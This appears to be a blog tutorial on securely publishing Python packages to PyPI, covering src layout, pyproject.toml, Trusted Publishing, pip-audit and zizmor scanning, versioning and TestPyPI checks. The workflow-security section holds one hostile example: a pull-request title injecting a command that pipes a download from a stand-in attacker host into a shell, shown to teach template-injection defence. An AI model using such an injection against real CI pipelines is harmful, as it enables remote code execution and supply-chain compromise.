Publishing Python packages in 2025 means dealing with an ecosystem under constant attack. PyPI faces a steady stream of malicious packages - thousands of uploads monthly - ranging from typosquatting to full supply chain attacks. The December 2024 Ultralytics breach, where attackers injected cryptocurrency-mining malware into a popular computer vision package, wasn't an anomaly - it's the new normal.
Modern Package Structure: src/ Layout Saves Lives
Forget everything you learned about Python package structure from tutorials written in 2019. The modern approach uses src layout - not because it's trendy, but because it prevents you from accidentally testing your local code instead of the installed package.
myproject/
├── src/
│   └── mypackage/
│       ├── __init__.py
│       └── core.py
├── tests/
├── pyproject.toml
└── README.md
Why this matters: with the src layout, Python can't silently import your package from the working directory when you run tests. You're forced to install the package and test what users actually get, catching import and packaging errors before they do. I've seen packages with 50k+ downloads that don't work because the maintainer never tested the installed version.
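You can see the effect from the project root: the package isn't importable until it's actually installed (a quick sketch, assuming the layout above):

$ python -c "import mypackage"
ModuleNotFoundError: No module named 'mypackage'

$ pip install .
$ python -c "import mypackage"   # now resolves to the installed copy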
pyproject.toml: The Only Config File You Need
setup.py is legacy garbage. Modern Python packaging uses pyproject.toml exclusively:
[build-system]
requires = ["setuptools>=61.0", "wheel"]
build-backend = "setuptools.build_meta"

[project]
name = "mypackage"
version = "0.1.0"
description = "Does stuff without breaking"
authors = [{name = "Your Name", email = "you@domain.com"}]
license = {text = "MIT"}
dependencies = [
    "requests>=2.31.0,<3.0.0",  # Pin major versions
    "click>=8.0.0",
]
requires-python = ">=3.8"
classifiers = [
    "Development Status :: 4 - Beta",
    "License :: OSI Approved :: MIT License",
    "Programming Language :: Python :: 3.8",
    "Programming Language :: Python :: 3.9",
    "Programming Language :: Python :: 3.10",
    "Programming Language :: Python :: 3.11",
]

[project.urls]
Homepage = "https://github.com/yourusername/mypackage"
Repository = "https://github.com/yourusername/mypackage.git"
Issues = "https://github.com/yourusername/mypackage/issues"

[tool.setuptools.packages.find]
where = ["src"]
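Before the first release, build the project and let twine validate the result; this catches broken README rendering and some metadata problems locally:

pip install build twine
python -m build       # writes an sdist and a wheel to dist/
twine check dist/*    # validates metadata and README rendering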
Trusted Publishing: No More Token Leakage
Traditional PyPI publishing means storing long-lived API tokens as GitHub secrets, and those tokens get compromised regularly - leaked through CI logs, stolen by compromised actions, or exposed in repository breaches. Trusted Publishing eliminates tokens entirely by letting PyPI authenticate GitHub Actions runs directly via short-lived OIDC credentials.
Setup takes 5 minutes:

PyPI side: Account Settings → Publishing → Add a new pending publisher
- Repository: yourusername/yourpackage
- Workflow filename: publish.yml
- Environment name: pypi (creates access control)

GitHub side: Create a protected environment named pypi in your repo settings
- Settings → Environments → New environment
- Add "Required reviewers" - only these people can trigger releases
- This prevents random contributors from publishing malicious updates
Workflow: Use the official PyPA action:
name: Publish to PyPI

on:
  release:
    types: [published]  # Only on tagged releases

jobs:
  publish:
    runs-on: ubuntu-latest
    environment: pypi  # References the protected environment
    permissions:
      id-token: write  # Required for trusted publishing
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-python@v5
        with:
          python-version: '3.11'
      - name: Build package
        run: |
          pip install build
          python -m build
      - uses: pypa/gh-action-pypi-publish@release/v1
        # No token needed - authenticates via OIDC
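If you also want a dry run from CI, the same action accepts a repository-url input for targeting TestPyPI (a sketch - you'd register a second trusted publisher on test.pypi.org for this to authenticate):

- uses: pypa/gh-action-pypi-publish@release/v1
  with:
    repository-url: https://test.pypi.org/legacy/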
Security Scanning: Catch Problems Before Users Do
Vulnerable dependencies are among the most common attack vectors. pip-audit scans your dependencies against the PyPA Advisory Database:
pip install pip-audit
pip-audit # Scans current environment
pip-audit --desc # Shows vulnerability descriptions
pip-audit --fix # Attempts to upgrade to safe versions
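In CI you often want to audit the dependencies you declare rather than whatever happens to be installed in the runner; pip-audit accepts a requirements file directly:

pip-audit -r requirements.txt --desc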
Workflow vulnerabilities get scanned by zizmor, which catches template injection attacks like the one that compromised Ultralytics:
pip install zizmor
zizmor .github/workflows/ # Scans all workflows
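What zizmor flags, concretely, is untrusted event data expanded directly inside a run script. A minimal illustration of the pattern (not the actual Ultralytics workflow):

# Vulnerable: the expression is substituted into the shell script itself,
# so a PR titled `"; curl https://evil.example | sh` runs arbitrary code
- run: echo "${{ github.event.pull_request.title }}"

# Safer: pass untrusted input through an environment variable
- run: echo "$PR_TITLE"
  env:
    PR_TITLE: ${{ github.event.pull_request.title }}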
Add both to your CI pipeline:
- name: Install audit tools
  run: pip install pip-audit zizmor

- name: Audit dependencies
  run: pip-audit --desc --format=json

- name: Audit workflows
  run: zizmor --format=json .github/workflows/
Version Management: Semantic Versioning That Doesn't Suck
Your version numbers communicate compatibility to automated tools. Use Semantic Versioning:
- 1.0.0 → 1.0.1: Bug fixes (safe to auto-update)
- 1.0.0 → 1.1.0: New features (probably safe)
- 1.0.0 → 2.0.0: Breaking changes (requires human review)
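These are exactly the ranges that version specifiers in pyproject.toml encode. A minimal sketch with the packaging library (the same machinery pip uses to evaluate them; the versions here are illustrative), showing how ">=2.31.0,<3.0.0" admits patch and minor bumps but excludes the next major:

from packaging.specifiers import SpecifierSet
from packaging.version import Version

spec = SpecifierSet(">=2.31.0,<3.0.0")

print(Version("2.31.5") in spec)  # True:  patch bump, auto-updatable
print(Version("2.32.0") in spec)  # True:  minor bump, still allowed
print(Version("3.0.0") in spec)   # False: major bump needs human review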
Automate versioning with bump2version:
pip install bump2version
bump2version patch # 1.0.0 → 1.0.1
bump2version minor # 1.0.1 → 1.1.0
bump2version major # 1.1.0 → 2.0.0
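Note that bump2version won't run bare: it reads the current version and the files to rewrite from a .bumpversion.cfg (or setup.cfg) at the project root. A minimal sketch matching the pyproject.toml above:

[bumpversion]
current_version = 0.1.0
commit = True
tag = True

[bumpversion:file:pyproject.toml]
search = version = "{current_version}"
replace = version = "{new_version}"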
Testing Your Package: The Reality Check
Test the installed package, not your local code:
# Build and install in an isolated environment
python -m build
pip install dist/*.whl --force-reinstall

# Test the installed version
python -c "import mypackage; print(mypackage.__version__)"
python -m pytest tests/  # Tests should still pass
Common gotchas that only show up in the installed version:
- Missing __init__.py files
- Incorrect package paths in pyproject.toml
- Data files that were never declared in MANIFEST.in or package-data (see the snippet below)
- Import errors due to incorrect module structure
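For the data-files case, a pyproject.toml-native alternative to MANIFEST.in is to declare package data via setuptools configuration - a sketch, assuming the files live under src/mypackage/data/:

[tool.setuptools]
include-package-data = true

[tool.setuptools.package-data]
mypackage = ["data/*.json"]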
Release Process: The Human Firewall
Automated publishing is convenient but dangerous. Implement human oversight:
- Code review: All changes require PR approval
- Protected environments: Only trusted maintainers can publish
- Release checklist: Document the manual steps
- Staging repository: Test on TestPyPI first
TestPyPI workflow:
# Upload to TestPyPI first
twine upload --repository testpypi dist/*

# Test install from TestPyPI
pip install --index-url https://test.pypi.org/simple/ mypackage

# If it works, upload to real PyPI
twine upload dist/*
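One caveat with that install command: TestPyPI doesn't host your dependencies, so a plain --index-url install can fail for reasons that have nothing to do with your package. Pull dependencies from the real index at the same time:

pip install --index-url https://test.pypi.org/simple/ \
    --extra-index-url https://pypi.org/simple/ mypackage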
This TestPyPI pass caught a bug in my last release where the package imported fine locally but failed on fresh installs due to a missing dependency declaration.
Pro tip: Always test your wheel installation in a completely fresh Python environment. I've seen packages that work with pip install -e . but fail when installed normally because they were importing from the local development directory.
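The check takes under a minute (a sketch - substitute whatever wheel filename python -m build produced):

python -m venv /tmp/fresh
/tmp/fresh/bin/pip install dist/mypackage-0.1.0-py3-none-any.whl
/tmp/fresh/bin/python -c "import mypackage; print(mypackage.__version__)"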